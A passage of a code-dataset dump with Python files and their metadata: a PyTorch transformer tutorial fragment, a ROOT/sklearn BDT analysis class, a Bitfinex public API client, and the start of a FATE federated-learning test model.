exist_ok=True)\n\n train_dataloader, val_dataloader, test_dataloader, tokenizer_tgt, train_ds, val_ds = get_ds8(config, model_folder)\n model = build_model8(config, tokenizer_tgt.get_vocab_size()).to(device)\n\n print(model)\n model.train()\n\n\nif __name__ == '__main__':\n # warnings.filterwarnings('ignore')\n config = get_config()\n device = get_device()\n debug_code_model8(config, device)\n", "repo_name": "prorates/pytorch-transformer-tutorials", "sub_path": "tutorial8.py", "file_name": "tutorial8.py", "file_ext": "py", "file_size_in_byte": 5361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "model8.build_transformer8", "line_number": 18, "usage_type": "call"}, {"api_name": "model8.Transformer8", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.manual_seed", "line_number": 32, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 34, "usage_type": "call"}, {"api_name": "config.get_model_folder", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "dataset8.get_ds8", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.optim.AdamW", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.reload_model", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.save_model", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 83, "usage_type": "attribute"}, {"api_name": "model8.Transformer8", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 88, "usage_type": "name"}, {"api_name": "dataset8.Dataset8", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 87, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 115, "usage_type": "call"}, {"api_name": "config.get_model_folder", "line_number": 117, "usage_type": "call"}, {"api_name": "pathlib.Path.exists", "line_number": 118, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 118, "usage_type": "name"}, {"api_name": "dataset8.get_testing_ds8", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.load_trained_model", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 128, "usage_type": "attribute"}, {"api_name": "config.get_model_folder", "line_number": 137, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 138, "usage_type": "call"}, {"api_name": "dataset8.get_ds8", "line_number": 140, "usage_type": "call"}, {"api_name": "config.get_config", "line_number": 149, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 150, "usage_type": "call"}]}
+{"seq_id": "20276449246", "text": "import pickle\n\nfrom sklearn.ensemble import AdaBoostClassifier\n\nimport ROOT\nimport PyAnalysisTools.PlottingUtils.PlottingTools as PT\nimport PyAnalysisTools.PlottingUtils.Formatting as FT\nimport PyAnalysisTools.PlottingUtils.Formatting as FM\nfrom PyAnalysisTools.AnalysisTools.MLHelper import TrainingReader, MLTrainConfig\nfrom PyAnalysisTools.base import InvalidInputError\nfrom PyAnalysisTools.base.OutputHandle import OutputFileHandle\nfrom PyAnalysisTools.base.FileHandle import FileHandle\nfrom PyAnalysisTools.PlottingUtils.PlotConfig import PlotConfig as pc\nfrom PyAnalysisTools.AnalysisTools.StatisticsTools import get_KS\nfrom PyAnalysisTools.base.ShellUtils import copy\nfrom PyAnalysisTools.base.YAMLHandle import YAMLLoader as yl\n\n\nclass BDTConfig(object):\n def __init__(self, **kwargs):\n kwargs.setdefault('num_layers', 4)\n for k, v in kwargs.items():\n setattr(self, k.lower(), v)\n\n\nclass SklearnBDTTrainer(object):\n def __init__(self, **kwargs):\n kwargs.setdefault('output_path', './')\n self.train_cfg = MLTrainConfig(**yl.read_yaml(kwargs['training_config_file']))\n self.bdt_cfg = BDTConfig(**yl.read_yaml(kwargs['bdt_config_file']))\n if 'variables' in kwargs:\n self.variable_list = kwargs['variables']\n elif 'var_list' in kwargs:\n self.variable_list = yl.read_yaml(kwargs['var_list'])['inputs']\n # copy(kwargs['var_list'], os.path.join(kwargs['output_path'], 'var_list.yml'))\n else:\n self.variable_list = None\n self.reader = TrainingReader(**kwargs)\n self.signal_df = None\n self.bkg_df = None\n self.labels = None\n for k, v in kwargs.items():\n setattr(self, k.lower(), v)\n\n def load_train_data(self):\n self.signal_df, self.bkg_df, self.labels = self.reader.prepare_data(self.train_cfg,\n variable_list=self.variable_list)\n\n def train_bdt(self):\n clf = AdaBoostClassifier()\n X_train, y_train, X_test, y_test = self.reader.pre_process_data(self.signal_df, self.bkg_df, self.labels,\n self.train_cfg, self.output_path)\n clf.fit(X_train, y_train)\n with open('test.pkl', 'wb') as f:\n pickle.dump(clf, f)\n\n\nclass BDTAnalyser(object):\n def __init__(self, **kwargs):\n if \"input_files\" not in kwargs:\n raise InvalidInputError(\"No input files provided\")\n kwargs.setdefault(\"output_path\", \"./\")\n self.file_handles = [FileHandle(file_name=file_name) for file_name in kwargs[\"input_files\"]]\n self.output_handle = OutputFileHandle(output_dir=kwargs[\"output_path\"])\n for arg, val in kwargs.iteritems():\n if not hasattr(self, arg):\n setattr(self, arg, val)\n ROOT.gROOT.SetBatch(True)\n\n def analyse(self):\n \"\"\"\n Main entry point to perform BDT analysis\n \"\"\"\n self.analyse_train_variables()\n self.perform_overtraining_check()\n self.perform_correlation_analysis()\n self.analyse_roc_curves()\n self.output_handle.write_and_close()\n\n def perform_overtraining_check(self):\n for file_handle in self.file_handles:\n self.analyse_overtraining(file_handle)\n\n def analyse_train_variables(self):\n for file_handle in self.file_handles:\n self.plot_train_variables(file_handle)\n\n def plot_train_variables(self, file_handle):\n def classify():\n variables = {}\n for signal_hist in signal_hists:\n variables[signal_hist.GetName().replace(\"__Signal\", \"\")] = [signal_hist]\n for background_hist in background_hists:\n variables[background_hist.GetName().replace(\"__Background\", \"\")].append(background_hist)\n return variables\n\n signal_hists = file_handle.get_objects_by_pattern(\"[A-z]*__Signal\",\n \"dataset/Method_BDTG/BDTG\")\n background_hists = file_handle.get_objects_by_pattern(\"[A-z]*__Background\",\n \"dataset/Method_BDTG/BDTG\")\n variables_hists = classify()\n for variable_name, variable_hists in variables_hists.iteritems():\n plot_config = pc(name=\"{:s}_{:d}\".format(variable_name, self.file_handles.index(file_handle)),\n color=[ROOT.kRed, ROOT.kBlue],\n draw=\"Hist\",\n watermark=\"Internal\",\n normalise=True,\n ymax=0.2)\n canvas = PT.plot_histograms(variable_hists, plot_config)\n FM.decorate_canvas(canvas, plot_config)\n self.output_handle.register_object(canvas, tdir=\"train_variables\")\n\n def analyse_overtraining(self, file_handle):\n training_score_signal = file_handle.get_object_by_name(\"MVA_BDTG_Train_S\", \"dataset/Method_BDTG/BDTG\")\n training_score_background = file_handle.get_object_by_name(\"MVA_BDTG_Train_B\", \"dataset/Method_BDTG/BDTG\")\n eval_score_signal = file_handle.get_object_by_name(\"MVA_BDTG_S\", \"dataset/Method_BDTG/BDTG\")\n eval_score_background = file_handle.get_object_by_name(\"MVA_BDTG_B\", \"dataset/Method_BDTG/BDTG\")\n\n ymax = 1.6 * max([training_score_signal.GetMaximum(), training_score_background.GetMaximum(),\n eval_score_signal.GetMaximum(), eval_score_background.GetMaximum()])\n\n kolmogorov_signal = get_KS(training_score_signal, eval_score_signal)\n kolmogorov_background = get_KS(training_score_background, eval_score_background)\n plot_config = pc(name=\"overtrain_{:d}\".format(self.file_handles.index(file_handle)),\n color=ROOT.kRed,\n draw=\"Marker\",\n style=20,\n ymax=ymax,\n watermark=\"Internal\")\n canvas = PT.plot_obj(training_score_signal, plot_config)\n plot_config.style = 24\n PT.add_object_to_canvas(canvas, eval_score_signal, plot_config)\n plot_config.style = 20\n plot_config.color = ROOT.kBlue\n PT.add_object_to_canvas(canvas, training_score_background, plot_config)\n plot_config.style = 24\n PT.add_object_to_canvas(canvas, eval_score_background, plot_config)\n FM.decorate_canvas(canvas, plot_config)\n FT.add_text_to_canvas(canvas, \"KS (signal): {:.2f}\".format(kolmogorov_signal), pos={'x': 0.18, 'y': 0.9},\n color=ROOT.kRed)\n FT.add_text_to_canvas(canvas, \"KS (bkg): {:.2f}\".format(kolmogorov_background), pos={'x': 0.18, 'y': 0.85},\n color=ROOT.kBlue)\n labels = [\"signal (train)\", \"signal (eval)\", \"background (train)\", \"background (eval)\"]\n FT.add_legend_to_canvas(canvas, labels=labels, xl=0.18, xh=0.3, yl=0.6, yh=0.82)\n self.output_handle.register_object(canvas, tdir=\"overtrain\")\n\n def perform_correlation_analysis(self):\n for file_handle in self.file_handles:\n self.analyse_correlations(file_handle)\n\n def analyse_correlations(self, file_handle):\n index = self.file_handles.index(file_handle)\n linear_corr_coeff_signal = file_handle.get_object_by_name(\"CorrelationMatrixS\", \"dataset\")\n linear_corr_coeff_background = file_handle.get_object_by_name(\"CorrelationMatrixB\", \"dataset\")\n plot_config = pc(name=\"linear_corr_coeff_signal_{:d}\".format(index), title=\"signal\", dist=None,\n draw_option=\"COLZTEXT\", ytitle=\"\", ztitle=\"lin. correlation [%]\")\n canvas_corr_coeff_signal = PT.plot_obj(linear_corr_coeff_signal, plot_config)\n plot_config.title = \"background\"\n plot_config.name = plot_config.name.replace(\"signal\", \"background\")\n canvas_corr_coeff_background = PT.plot_obj(linear_corr_coeff_background, plot_config)\n self.output_handle.register_object(canvas_corr_coeff_signal)\n self.output_handle.register_object(canvas_corr_coeff_background)\n correlation_hists_signal = file_handle.get_objects_by_pattern(\"scat_.*_Signal_Id\",\n \"dataset/InputVariables_Id/CorrelationPlots\")\n correlation_hists_background = file_handle.get_objects_by_pattern(\"scat_.*_Background_Id\",\n \"dataset/InputVariables_Id/CorrelationPlots\")\n plot_config_corr = pc(name=\"correlation_hist\", dist=None, draw_option=\"COLZ\", watermark=\"Internal\")\n for hist in correlation_hists_signal:\n variable_info = hist.GetName().split(\"_\")[1:-2]\n plot_config_corr.name = \"corr_\" + \"_\".join(variable_info) + \"_signal_{:d}\".format(index)\n split_index = variable_info.index(\"vs\")\n variable_x = \"_\".join(variable_info[:split_index])\n variable_y = \"_\".join(variable_info[split_index + 1:])\n plot_config_corr.xtitle = variable_x\n plot_config_corr.ytitle = variable_y\n plot_config_corr.ztitle = \"Entries\"\n canvas = PT.plot_obj(hist, plot_config_corr)\n FM.decorate_canvas(canvas, plot_config_corr)\n self.output_handle.register_object(canvas)\n for hist in correlation_hists_background:\n plot_config_corr.name = \"corr_\" + \"_\".join(hist.GetName().split(\"_\")[1:-2]) + \"_background_{:d}\".format(\n index)\n canvas = PT.plot_obj(hist, plot_config_corr)\n FM.decorate_canvas(canvas, plot_config_corr)\n self.output_handle.register_object(canvas)\n\n def analyse_roc_curves(self):\n for file_handle in self.file_handles:\n self.plot_roc_curves(file_handle)\n\n def plot_roc_curves(self, file_handle):\n def make_plot(dist, pc):\n roc_eff = file_handle.get_objects_by_pattern(dist, \"dataset/Method_BDTG/BDTG\")\n canvas = PT.plot_histograms(roc_eff, pc)\n FM.decorate_canvas(canvas, pc)\n self.output_handle.register_object(canvas, tdir=\"performance\")\n\n index = self.file_handles.index(file_handle)\n pc_roc_eff = pc(name=\"roc_eff_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\",\n ytitle=\"Background efficiency\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_effBvsS\", pc_roc_eff)\n pc_roc_inveff = pc(name=\"roc_inveff_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\", logy=True,\n ytitle=\"Inverse Background efficiency\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_invBeffvsSeff\", pc_roc_inveff)\n pc_roc_rejeff = pc(name=\"roc_rej_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\",\n ytitle=\"Background rejection\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_rejBvsS\", pc_roc_rejeff)\n\n def fit_score(self):\n bdt_score = ROOT.RooRealVar(self.branch_name, \"BDT score\", -0.9, 1.)\n chain = ROOT.TChain(\"Nominal/\" + self.tree_name)\n for file_handle in self.file_handles[1:]:\n chain.Add(file_handle.file_name)\n p0 = ROOT.RooRealVar(\"p0\", \"p0\", 1, -10., 10.)\n p1 = ROOT.RooRealVar(\"p1\", \"p1\", 1, -10., 10.)\n p2 = ROOT.RooRealVar(\"p2\", \"p2\", 1, -100., 100.)\n p3 = ROOT.RooRealVar(\"p3\", \"p3\", 1, -10., 10.)\n p4 = ROOT.RooRealVar(\"p4\", \"p4\", 1, -10., 10.)\n norm = ROOT.RooRealVar(\"norm\", \"norm\", chain.GetEntries(), 0., chain.GetEntries() * 2)\n mass = ROOT.RooRealVar(\"object_m\", \"object_m\", 0., 100000.)\n genpdf = ROOT.RooGenericPdf(\"genpdf\", \"genpdf\",\n \"norm * (p0 + p1 * exp(({:s} + 1.) *p2) + \"\n \"p3 * abs({:s})^(({:s} + 1.)*p4))\".format(self.branch_name, self.branch_name,\n self.branch_name),\n ROOT.RooArgList(bdt_score, p0, p1, p2, p3, p4, norm))\n data = ROOT.RooDataSet(\"data\", \"BDT_170526\", chain, ROOT.RooArgSet(bdt_score, mass),\n \"object_m/1000. < 1713. || object_m/1000. > 1841.\")\n frame = bdt_score.frame()\n data.plotOn(frame, ROOT.RooFit.Name(\"data\"), ROOT.RooFit.Binning(25))\n fit_result = genpdf.fitTo(data, ROOT.RooFit.Save())\n canvas = ROOT.TCanvas(\"c\", \"c\", 800, 600)\n canvas.cd()\n genpdf.plotOn(frame, ROOT.RooFit.Name(\"model\"))\n PT.add_fit_to_canvas(canvas, fit_result, genpdf, frame)\n FM.add_atlas_label(canvas, \"Internal\")\n frame.Draw()\n canvas.Modified()\n self.output_handle.register_object(canvas)\n self.output_handle.write_and_close()\n", "repo_name": "morgenst/PyAnalysisTools", "sub_path": "PyAnalysisTools/AnalysisTools/BDTAnalyser.py", "file_name": "BDTAnalyser.py", "file_ext": "py", "file_size_in_byte": 12900, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyAnalysisTools.AnalysisTools.MLHelper.MLTrainConfig", "line_number": 29, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 29, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 29, "usage_type": "name"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 30, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 30, "usage_type": "name"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 34, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 34, "usage_type": "name"}, {"api_name": "PyAnalysisTools.AnalysisTools.MLHelper.TrainingReader", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.ensemble.AdaBoostClassifier", "line_number": 50, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 55, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.InvalidInputError", "line_number": 61, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.FileHandle.FileHandle", "line_number": 63, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.OutputHandle.OutputFileHandle", "line_number": 64, "usage_type": "call"}, {"api_name": "ROOT.gROOT.SetBatch", "line_number": 68, "usage_type": "call"}, {"api_name": "ROOT.gROOT", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 103, "usage_type": "call"}, {"api_name": "ROOT.kRed", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ROOT.kBlue", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_histograms", "line_number": 109, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 109, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 110, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 110, "usage_type": "name"}, {"api_name": "PyAnalysisTools.AnalysisTools.StatisticsTools.get_KS", "line_number": 122, "usage_type": "call"}, {"api_name": "PyAnalysisTools.AnalysisTools.StatisticsTools.get_KS", "line_number": 123, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 124, "usage_type": "call"}, {"api_name": "ROOT.kRed", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 130, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 130, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 132, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 132, "usage_type": "name"}, {"api_name": "ROOT.kBlue", "line_number": 134, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 135, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 135, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 137, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 137, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 138, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 138, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_text_to_canvas", "line_number": 139, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 139, "usage_type": "name"}, {"api_name": "ROOT.kRed", "line_number": 140, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_text_to_canvas", "line_number": 141, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 141, "usage_type": "name"}, {"api_name": "ROOT.kBlue", "line_number": 142, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_legend_to_canvas", "line_number": 144, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 144, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 155, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 157, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 157, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 160, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 160, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 167, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 177, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 177, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 178, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 178, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 183, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 183, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 184, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 184, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_histograms", "line_number": 194, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 194, "usage_type": "argument"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 194, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 195, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 195, "usage_type": "argument"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 195, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 199, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 202, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 205, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 210, "usage_type": "call"}, {"api_name": "ROOT.TChain", "line_number": 211, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 214, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 215, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 216, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 217, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 218, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 219, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 220, "usage_type": "call"}, {"api_name": "ROOT.RooGenericPdf", "line_number": 221, "usage_type": "call"}, {"api_name": "ROOT.RooArgList", "line_number": 225, "usage_type": "call"}, {"api_name": "ROOT.RooDataSet", "line_number": 226, "usage_type": "call"}, {"api_name": "ROOT.RooArgSet", "line_number": 226, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Name", "line_number": 229, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 229, "usage_type": "attribute"}, {"api_name": "ROOT.RooFit.Binning", "line_number": 229, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Save", "line_number": 230, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 230, "usage_type": "attribute"}, {"api_name": "ROOT.TCanvas", "line_number": 231, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Name", "line_number": 233, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_fit_to_canvas", "line_number": 234, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 234, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_atlas_label", "line_number": 235, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 235, "usage_type": "name"}]}
+{"seq_id": "28897294104", "text": "from datetime import datetime\n# local\nfrom . import constants_v2 as _c\nfrom . import models_v2 as _m\nfrom ..base import Client\nfrom .server import BitfinexServerV2 as Server\n\n_p = _c.Path\n\n\nclass BitfinexPublic(Client):\n def __init__(self, timeout=30):\n Client.__init__(self, Server(), timeout)\n\n def ticker(self, symbol: _c.Symbol = _c.Symbol.BTCUSD):\n symbol = _c.Symbol.check(symbol).value\n url = self.url_for(_p.TICKER, path_arg=symbol)\n data = self.get(url)\n return _m.TradingTicker.create_from_json(data)\n\n def tickers(self, symbols: list):\n symbols = [_c.Symbol.check(symbol).value for symbol in symbols]\n parameters = {\n 'symbols': symbols,\n }\n url = self.url_for(_p.TICKERS)\n data = self.get(url, params=parameters)\n return {ticker[0]: _m.TradingTicker.create_from_json(ticker[1:])\n for ticker in data}\n\n def trades(self,\n symbol: _c.Symbol = _c.Symbol.BTCUSD,\n limit=None,\n start=None,\n end=None,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n if isinstance(start, datetime):\n start = start.timestamp() * 1000\n if isinstance(end, datetime):\n end = end.timestamp() * 1000\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'limit': limit,\n 'start': start,\n 'end': end,\n 'sort': sort,\n }\n url = self.url_for(_p.TRADES, path_arg=symbol)\n data = self.get(url, params=parameters)\n return [_m.TradingTrade.create_from_json(trade)\n for trade in data]\n\n def books(self,\n symbol: _c.Symbol,\n precision: _c.BookPrecision,\n length=None):\n symbol = _c.Symbol.check(symbol).value\n precision = _c.BookPrecision.check(precision).value\n parameters = {\n 'len': length,\n }\n path_arg = '{0}/{1}'.format(symbol, precision)\n url = self.url_for(_p.BOOKS, path_arg=path_arg)\n data = self.get(url, params=parameters)\n return [_m.TradingBook.create_from_json(book)\n for book in data]\n\n def stats(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n section: str,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n assert key in ['funding.size', 'credits.size', 'credits.size.sym', 'pos.size']\n assert size in ['1m']\n assert side in ['long', 'short']\n assert section in ['last', 'hist']\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'sort': sort,\n }\n path_arg = '{0}:{1}:{2}:{3}/{4}'.format(key, size, symbol, side, section)\n url = self.url_for(_p.STATS, path_arg=path_arg)\n data = self.get(url, params=parameters)\n if section == 'last':\n return _m.Stat.create_from_json(data)\n else:\n return [_m.Stat.create_from_json(stat)\n for stat in data]\n\n def stats_last(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n sort=None):\n return self.stats(symbol, key, size, side, 'last', sort)\n\n def stats_hist(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n sort=None):\n return self.stats(symbol, key, size, side, 'hist', sort)\n\n def candles(self,\n symbol: _c.Symbol,\n section: str,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n assert time_frame in ['1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1D', '7D', '14D', '1M']\n assert section in ['last', 'hist']\n if isinstance(start, datetime):\n start = start.timestamp() * 1000\n if isinstance(end, datetime):\n end = end.timestamp() * 1000\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'limit': limit,\n 'start': start,\n 'end': end,\n 'sort': sort,\n }\n path_arg = '{0}:{1}/{2}'.format(time_frame, symbol, section)\n url = self.url_for(_p.CANDLES, path_arg=path_arg)\n data = self.get(url, params=parameters)\n if section == 'last':\n return _m.Candle.create_from_json(data)\n else:\n return [_m.Candle.create_from_json(candle)\n for candle in data]\n\n def candles_last(self,\n symbol: _c.Symbol,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n return self.candles(symbol, 'last', time_frame, limit, start, end, sort)\n\n def candles_hist(self,\n symbol: _c.Symbol,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n return self.candles(symbol, 'hist', time_frame, limit, start, end, sort)\n", "repo_name": "mglcampos/trader", "sub_path": "htr/helpers/wrappers/bitfinex/client_public_v2.py", "file_name": "client_public_v2.py", "file_ext": "py", "file_size_in_byte": 5460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Client", "line_number": 11, "usage_type": "name"}, {"api_name": "base.Client.__init__", "line_number": 13, "usage_type": "call"}, {"api_name": "base.Client", "line_number": 13, "usage_type": "name"}, {"api_name": "server.BitfinexServerV2", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 123, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "argument"}]}
+{"seq_id": "26895681135", "text": "import argparse\nimport numpy as np\nimport os\nfrom tensorflow import keras\nimport pandas\nimport tensorflow as tf\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras import optimizers\nfrom sklearn import metrics\nfrom pipeline.utils.tools import JobConfig\nfrom sklearn.preprocessing import LabelEncoder\n\nimport torch as t\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader\nimport tqdm\nfrom pipeline import fate_torch_hook\nfate_torch_hook(t)\n\n\nclass TestModel(t.nn.Module):\n\n def __init__(self, guest_input_shape, host_input_shape):\n super(TestModel, self).__init__()\n\n self.guest_bottom = t.nn.Sequential(\n nn.Linear(guest_input_shape, 10, True),\n nn.ReLU(),\n nn.Linear(10, 8, True),\n nn.ReLU()\n )\n\n self.host_bottom = t.nn.Sequential(\n nn.Linear(host_input_shape, 10, True),\n nn.ReLU(),\n nn.Linear(10, 8, True),\n nn.ReLU()\n )\n\n self.inter_a, self.inter_b = t.nn.Linear(8, 4, True), t.nn.Linear(8, 4, True)\n\n self.top_model_guest = t.nn.Sequential(\n nn.Linear(4, 1, True),\n nn.Sigmoid()\n )\n\n def forward(self, data):\n x_guest, x_host = data[0].type(t.float), data[1].type(t.float)\n guest_fw = self.inter_a(self.guest_bottom(x_guest))\n host_fw = self.inter_b(self.host_bottom(x_host))\n out = 